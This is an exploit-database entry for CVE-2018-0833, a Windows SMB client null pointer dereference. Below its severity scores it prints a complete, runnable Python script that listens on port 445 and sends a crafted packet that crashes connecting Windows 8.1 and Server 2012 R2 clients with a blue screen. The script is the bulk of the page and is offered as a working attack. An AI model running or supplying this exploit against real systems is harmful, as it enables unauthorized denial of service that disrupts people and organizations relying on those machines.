Microsoft Windows Windows 8.1/2012 R2 SMB Denial of Service

2018.02.28
Credit: Nabeel Ahmed
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-476


CVSS Base Score: 6.3/10
Impact Subscore: 6.9/10
Exploitability Subscore: 6.8/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Single time
Confidentiality impact: None
Integrity impact: None
Availability impact: Complete

# Exploit Title: Microsoft Windows SMB Client Null Pointer Dereference Denial of Service # Date: 26/02/2018 # Exploit Author: Nabeel Ahmed # Version: SMBv3 # Tested on: Windows 8.1 (x86), Windows Server 2012 R2 (x64) # CVE : CVE-2018-0833 import SocketServer from binascii import unhexlify payload = '000000ecfd534d4241414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141' class byebye(SocketServer.BaseRequestHandler): def handle(self): try: print "From:", self.client_address print "[*]Sending Payload..." self.request.send(unhexlify(payload)) except Exception: print "BSoD Triggered on", self.client_address pass SocketServer.TCPServer.allow_reuse_address = 1 launch = SocketServer.TCPServer(('', 445),byebye) launch.serve_forever()


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top